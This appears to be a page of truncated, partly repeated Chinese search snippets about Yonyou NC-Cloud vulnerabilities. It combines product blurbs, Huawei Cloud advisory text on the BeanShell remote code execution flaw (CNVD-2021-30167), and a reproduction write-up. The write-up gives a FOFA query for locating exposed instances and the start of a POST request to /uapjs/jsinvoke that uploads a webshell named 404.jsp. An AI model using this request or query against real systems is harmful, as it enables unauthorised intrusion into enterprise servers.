app="用友-NC-Cloud" 产品介绍 NC产品线构建在UAP平台之上,支持支持多种硬件服务器、多种操作系统、多种数据库、多种应用服务器及中间件、多种端,支持多种行业标准和开发协议。该产品从应用方面来说,包括NC核心应用产品、NC行业产品、NC本地化产品、以及企业客户定制应用等。通过集成平台,可实现与客户现有应用系统...
FOFA: app="用友-NC-Cloud" 漏洞复现 测试目标:http://127.0.01:8090 POC1:发送POST请求上传名为404.jsp的webshell,经测试返回404或200均为上传成功 POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: 10.211.55.5:8090 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Age...
app="用友-NC-Cloud"产品介绍 NC产品线构建在UAP平台之上,支持多种硬件服务器、多种操作系统、多种数据库、多种应用服务器及中间件、多种端,支持多种行业标准和开发协议。该产品从应用方面来说,包括NC核心应用产品、NC行业产品、NC本地化产品、以及企业客户定制应用等。通过集成平台,可实现与客户现...
近日,华为云关注到业界有安全研究人员披露用友NC BeanShell远程代码执行漏洞(CNVD-2021-30167),未授权的攻击者利用漏洞可以构造恶意请求,实现在目标系统上执行任意代码,目前漏洞POC已公开,风险较高。 用友NC是一个面向集团企业的管理软件,华为云提醒使用用友NC的用户及时安排自检并做好安全加固以降低安全风险。 二、威胁...
近日,华为云关注到业界有安全研究人员披露用友NC BeanShell远程代码执行漏洞(CNVD-2021-30167),未授权的攻击者利用漏洞可以构造恶意请求,实现在目标系统上执行任意代码,目前漏洞POC已公开,风险较高。 用友NC是一个面向集团企业的管理软件,华为云提醒使用用友NC的用户及时安排自检并做好安全加固以降低安全风险。